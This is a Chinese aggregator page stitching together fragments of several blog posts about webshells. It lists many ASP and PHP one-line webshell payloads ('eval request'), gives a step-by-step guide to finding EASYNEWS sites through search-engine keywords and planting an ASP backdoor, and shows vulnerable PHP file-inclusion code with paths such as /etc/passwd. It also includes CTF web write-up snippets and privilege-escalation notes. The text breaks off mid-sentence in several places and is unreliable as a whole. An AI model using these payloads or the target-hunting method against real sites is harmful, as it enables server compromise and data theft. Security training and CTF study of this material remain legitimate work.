一句话木马

一句话木马

青春壹個敷衍的年華 提交于 2020-03-02 01:02:15
<%eval request(“c”)%> <%execute request(“c”)%> <%execute(request(“c”))%> <%ExecuteGlobal request(“sb”)%> %><%Eval(Request(chr(35)))%><% <%if request (“c”)<>"“then session(“c”)=request(“c”):end if:if session(“c”)<>”" then execute session(“c”)%> <%eval(Request.Item[“c”],“unsafe”);%> <%eval(request(“c”)):response.end%> <%execute request(“c”)%><%<%loop<%:%> <%<%loop<%:%><%execute request(“c”)%> <%execute request(“c”)<%loop<%:%> <%if Request(“c”)<>"" ThenExecuteGlobal(Request(“c”))%> '不用"<,>" <% @Language=“JavaScript” CodePage="65001"var lcx={‘名字’:Request.form(’#’),‘性别’:eval,‘年龄’:‘18’,‘昵称’:‘请叫我一声老大

一句话木马使用方法总结

时光毁灭记忆、已成空白 提交于 2020-03-01 08:26:12
“EASYNEWS新闻管理系统 v1.01 正式版”是在企业网站中非常常见的一套整站模版,在该网站系统的留言本组件中就存在着数据过滤不严漏洞,如果网站是默认路径和默认文件名安装的话,入侵者可以利用该漏洞直接上传ASP木马程序控制整个网站服务器。 Step1 搜索入侵目标 使用了“EASYNEWS新闻管理系统 v1.01 正式版”的网站,在网站页面的底部版权声明处,往往会有关键字符为“WWW.52EASY.COM 版权所有”。只要在GOOGLE或百度中以该字符串为关键词进行搜索,就可以找到大量的入侵目标。 Step2 检测入侵条件 在这里,我们以网站“http://www.qswtj.com/news/index.htm”为例进行一次入侵检测。“EASYNEWS新闻管理系统”网站的留言本数据库文件默认是位于“\ebook\db\ebook.asp”,首先在浏览器地址栏中输入“http://www.qswtj.com/news/ebook/db/ebook.asp”,回车后在浏览器页面中将显示访问留言本数据库文件的返回信息。如果在页面中显示乱码,则说明该网站的留言本数据库文件没有改名,可以进行入侵。 Step3 在数据库中插入ASP后门 前面提到了该新闻系统的留言本插件存在过滤不严,因此我们可以通过提交发言,在数据库中插入“一句话木马”服务端代码: 在浏览器中访问“http://www

文件包含漏洞小记

时间秒杀一切 提交于 2020-02-29 05:17:13
文件包含函数   include 调用文件用的函数   require <?php echo'<meta http-equiv="Content-Type" content="text/html;charset=gb2312" />'; // include '1.txt'; // $a = $_GET['page']; $a = "$_GET[page]"; // echo $a; include $a; ?> include 调用a ,这里可以给a传入任意文件,这个文件有可能传入的是木马文件,能传入任意文件就是文件包含漏洞 远程文件包含     要求php.ini中的 allow_url_include=on 例如:127.0.0.1/cs/main.php?page=http://www.baidu.com/index.html 文件main.php 中 page 传入的是百度 常见的敏感文件 unix/linux 系统中   /etc/passwd----------里面一般存放的是用户的一些数据   /usr/local/app/apache2/conf/httpd.conf----------------里面存放的apache2 默认的配置文件   /usr/local/app/apache2/conf/extra/httpd-vhosts.conf---------

攻防世界web初级题

試著忘記壹切 提交于 2020-02-12 14:50:13
1.view_source 2.robots 3.backup 4.cookie 5.disabled_button 6.weak_auth 7.simple_php 8.get_post 9.xff_referer 10.webshell 11.command_excution 12.simple_js 1.view_source ctrl+u查看源代码 出现以下界面: 得到flag。 2.robots 首先了解一下robots.txt的概念: robots是网站跟爬虫间的协议,用简单直接的txt格式文本方式告诉对应的爬虫被允许的权限,也就是说robots.txt是搜索引擎中访问网站的时候要查看的第一个文件。 也就是说robots.txt中存在的文件名是我们作为用户不能访问的文件。而我们为了寻找flag,则就是遇见凡是不能访问的就去访问。 构建路径:在地址栏后写入/robots.txt,得到不允许访问的界面的文件名。 访问:/f1ag_1s_h3re.php 得到flag。 3.backup 首先普及一个关于备份文件的概念: 文本编辑器和代码编辑器通常对正在编辑的文件会事先产生一个备份文件,这样做的目的是让出问题后可以恢复文件。这类备份文件通常和原文件在同一个目录下,而且文件的命名也和原文件类似。 例如:对一个名为index.php的文件进行编辑,自动创建的备份文件将会被命名成

CTF-文件上传

喜欢而已 提交于 2020-02-11 18:23:49
CTF-文件上传 写在前面: 文件上传漏洞常用于获取 webshell ,从而取得对目标网站(系统)的控制权。要获取 shell ,需要: 1.知道上传后文件所保存位置(不知道那就猜、爆破) 2.上传后文件的名字(是否被更改) 00一句话木马 <?php eval($_POST['password']);?> 一句话木马原理及不同类型: https://baike.baidu.com/item/%E4%B8%80%E5%8F%A5%E8%AF%9D%E6%9C%A8%E9%A9%AC/1845646?fr=aladdin 在文章后续会根据例子提供一句话木马的变式 01 毫无过滤 直接上传即可获取 webshell 02 前端过滤 2.1绕过js过滤 例: function checkFile() { var file = document.getElementsByName('upload_file')[0].value; if (file == null || file == "") { alert("请选择要上传的文件!"); return false; } //定义允许上传的文件类型 var allow_ext = ".jpg|.png|.gif"; //提取上传文件的类型 var ext_name = file.substring(file.lastIndexOf(".")

攻防世界webshell

≡放荡痞女 提交于 2020-02-01 10:28:09
这一题主要是关于一句话木马的使用与工具的使用。本题不难,针对像我一样的新手用来了解其中内涵吧。 题目描述:小宁百度了php一句话,觉着很有意思,并且把它放在index.php里 打开页面,出现一句话木马 使用蚁剑进行操作,一句话木马中给出密码是shell,进行添加 点击进入添加的地址: 拿到flag 来源: CSDN 作者: zouchengzhi1021 链接: https://blog.csdn.net/zouchengzhi1021/article/details/104074674

绕过WAF-一句话木马

こ雲淡風輕ζ 提交于 2019-12-10 11:27:59
注:本次的测试环境是最新的安全狗Apache:V4.0 一句话木马:<?php eval($_REQUEST['a'])?> 1.但是这样写容易被安全狗这些拦截,所以可以考虑替换某些函数,比如eval换成assert()或者reate_function()或者是call_user_func() 2.使用end()函数来代替,可以写成: <?php eval(end($_REQUEST)); ?> 注:密码是随便写,在安全狗上是查不出来的,但是D盾会查出一个最低价的危险,所以,如果要让D盾完全测不出来可以这样写: <?php if($_SERVER['HTTP_USER_AGENT'] === '1'{ eval(end($_REQUEST));} ?> 3.字符拼接加双美元符 <?php $a='ass'; $b='ert'; $funcName=$a.$b //assert $x='funcName'; $$x($_REQUEST['a']); ?> 4.常量 <?php defin("a","$_REQUEST['a']");eval(a); ?> 5.用函数强行分割 <?php function a($a){ return $a;} eval (a($_REQUEST)['hh']); ?> 6.用类分割 <?php class User {public $name=' ';

内网渗透测试思路-FREEBUF

你。 提交于 2019-12-10 05:09:44
(在拿到webshell的时候,想办法获取系统信息拿到系统权限) 一、通过常规web渗透,已经拿到webshell。那么接下来作重要的就是探测系统信息,提权,针对windows想办法开启远程桌面连接,针对linux想办法使用反弹shell来本地连接。 ① Webshell应该都可以调用系统cmd执行一些简单的命令,那么whoami(查看当前权限),netuser(查看用户/组),systeminfo(查看系统补丁修复情况)等常见命令应该是首先被执行 探测的。 I: 不具备系统权限: ① Serv-U提权,现在很多的webshell都集成了Serv-U一键提权功能,只需要点击一下就拥有了系统权限,简单快速。 ② SQL Server提权,利用webshell的目录翻阅功能,查找网站根目录下的数据库配置文件,以php为例则为config.php;查看文件内容一般都会发现数据库的登陆信息用户名/密码,(密码md5或者其他的加密方式解密一下即可),通过webshell或者数据库端口开放的话利用数据库连接工具Navicat等工具来连接数据库。 连接数据库检查xp_cmdshell是否存在,扩展存储过程是否打开,再利用xp_cmdshell来执行系统命令,添加用户、开启远程桌面等。 常用命令: select count(*) from master.dbo.sysobjectswhere

CTF学习报告4

核能气质少年 提交于 2019-12-05 12:34:56
CTF编辑器漏洞分析 访问ip地址 接下来查询fckeditor的版本 一般是/fckeditor/_whatsnew.html 所以访问http://219.153.49.228:49105/fckeditor/_whatsnew.html 可以看到fckeditor的版本是2.6.4 然后我们需要知道这个fckeditor的上传地址 一般上传地址有这几种 (1)fckeditor/editor/filemanager/browser/default/connectors/test.html (2)fckeditor/editor/filemanager/upload/test.html (3)fckeditor/editor/filemanager/connectors/test.html (4)fckeditor/editor/filemanager/connectors/uploadtest.html 可以都试一下,然后发现正确的上传地址是(3) 访问界面 然后上传一个后缀为.asp的一句话木马。 常用一句话木马 asp一句话木马:    <%execute(request("value"))%>   php一句话木马:    <?php @eval($_POST[value]);?>   aspx一句话木马:   <%@ Page Language="Jscript"%>

'文件上传总结'

守給你的承諾、 提交于 2019-12-03 10:27:17
1. WebShell 1.1 什么是Shell Shell是系统的用户界面,提供了用户与内核进行交互操作的一种接口。它接收用户输入的命令并把它送入内核去执行。因为系统内核使我们不能直接操作的,shell就给我们提供了一个接口,通过shell我们可以把命令送入到内核。shell管理用户与操作系统之间的交互:等待你输入,向操作系统解释你的输入,并且处理各种各样的操作系统的输出结果。 传统意义上的shell指的是命令行式的shell,以后如果不特别注明,shell是指命令行式的shell。 表示用户拥有的权限,不同的shell权限不同 1.2 WebShell 黑客在入侵了一个网站后,通常会留下一个asp或php后门文件与网站web服务器进行交互,得到一个命令执行环境,以达到控制网站服务器的目的。这个后门文件就是所谓的webshell。 2. 木马分类 2.1 一句话木马 一句话木马是Webshell的一种,由于这类Webshell代码比较少,往往只有一行代码,所以就被称为一句话木马。 一句话木马虽然代码简单,但是结合中国菜刀、蚁剑等WebShell管理工具,它们的功能却是非常的强大。 2.1.1 一句话木马工作原理 在PHP、ASP、ASPX中都有可以执行外部程序的函数,一句话木马就是通过这些函数来工作的,由页面传输待执行的命令,函数在远程执行命令。 PHP一句话木马 Copy 1